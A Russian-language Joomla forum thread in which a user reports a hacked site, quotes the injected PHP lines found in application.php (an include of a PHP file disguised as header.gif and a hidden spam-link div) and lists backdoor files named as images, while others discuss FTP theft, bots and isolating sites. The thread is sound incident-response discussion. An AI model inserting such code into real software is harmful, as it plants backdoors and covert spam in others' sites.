Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом взял Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2631 Просмотров
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Сегодня обнаружил взломанный сайт, в подвале сайта были ссылки написаны в диве размером 10px.

Может кому пригодится, нашел внедрение в фаиле /includes/application.php в 271 сроке
 
Код
		$document_render_content = str_replace('</body>', '', $document->render($caching, $params));
$document_render_content = str_replace('</html>', '', $document_render_content);

include_once($_SERVER['DOCUMENT_ROOT'].'/modules/mod_banners/header.gif');
 
$document_render_content .= "<div style=\"font-size: 10px;\">".@$sys_lctr."</div>\n</body>\n</html>";

JResponse::setBody($document_render_content);

так же появились файлы в директориях:
/modules/mod_banners/     появились php файлы но расширение jpg стоит на них (base, data, header,highlight,icon,login,symbol,tools)   при открытии редактором в них находится код.

/modules/mod_footer/tmpl   фаил class_calendar.php   тоже с вирусом

фаил появился в корне (забыл как называется, какой-то инклудс пхп)

и один фаил появился в директории /media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img
фаил назывался img.php

дата создания всех файлов 19 января 15 года
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Версия Joomla, количество сайтов на аккаунте хостинга?
*

SELEVE

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Версия 2.5.9.  сайтов на хосте около 20 где-то.
Были на хосте проблемы с рассылкой спама (тоже были созданы вирусные файлы, сайты находились в одном аккаунте, потом вылечил, разнес по разным аккаунтам),
Пострадали сайты старой версии Joomla, причем одной и той же версии (это не мои проекты были, другой человек все эти сайты заливал), взор упал что на почти всех сайтах был странный плагин фотогалереи, который превью сам собирает в кеш (файлы фото просто загружались в папку на FTP, видимо для более простого управления сайтом)
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь. Не вылечили.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Основная причина заражения - это вирус на ПК, который украл ftp пароль.

Цитировать
Разносите сайты по разным пользователям или аккаунтам хостинга или не избавитесь

Хорошее замечание. Именно так и нужно делать - изоляция юзеров.
« Последнее редактирование: 27.02.2015, 23:21:09 от capricorn »
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
сайтов на хосте около 20 где-то.

Все разнести. Не долечили просто. Да и обновить давно пора. Вряд ли вирус на ПК, но проверить не помешало бы.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
дата создания всех файлов 19 января 15 года
посмотрите логи веб сервера за 19.01.2015. если там ничего нет, то залили по ftp. есть другие варианты?

Цитировать
Пострадали сайты старой версии Joomla
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).


« Последнее редактирование: 27.02.2015, 23:35:41 от capricorn »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
даже устаревший движок редко ломают. мне так кажется (надо нарваться на уж очень скрупулезного бота).
Боты сейчас с высшим образованием  ;), уж поверьте, а FTP с ПК уже давно (с 2009-2010) не крадут, зачем время тратить когда стоит "псу" команду дать в виде домена, а он сам всю работу сделает.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
а FTP с ПК уже давно (с 2009-2010) не крадут

Еще как крадут. Никогда не видели с MS Security Essentials (легальная Windows 7 Ultimate) - уровень оповещения "критический", а действие "разрешено"? Я как раз в это время покупал жд билет. Для меня это закончилось, к счастью, блокировкой банковской карты. До меня только потом дошло задуматься.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
В скрупулезности ботов можно быть уверенным. Было до 300 логов в минуту на очень большое количество расширений. Бот не устает.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
Не кажется ли Вам что FTP и платежный фишинг, немного разные вещи.

как раз в это время и сайт был заражен, именно по ftp.

вот еще интересная история. стоит почитать
http://ktonanovenkogo.ru/web-obzory/kak-proverit-sajt-na-virusy-proverka-onlajn-zarazheniya.html
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3146
Последний ответ 31.03.2024, 16:14:32
от SeBun
Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2487
Последний ответ 14.02.2024, 13:15:59
от wishlight
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 268119
Последний ответ 14.09.2022, 14:29:43
от wishlight
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2260
Последний ответ 05.11.2021, 21:47:31
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2749
Последний ответ 05.10.2021, 21:39:26
от ShopES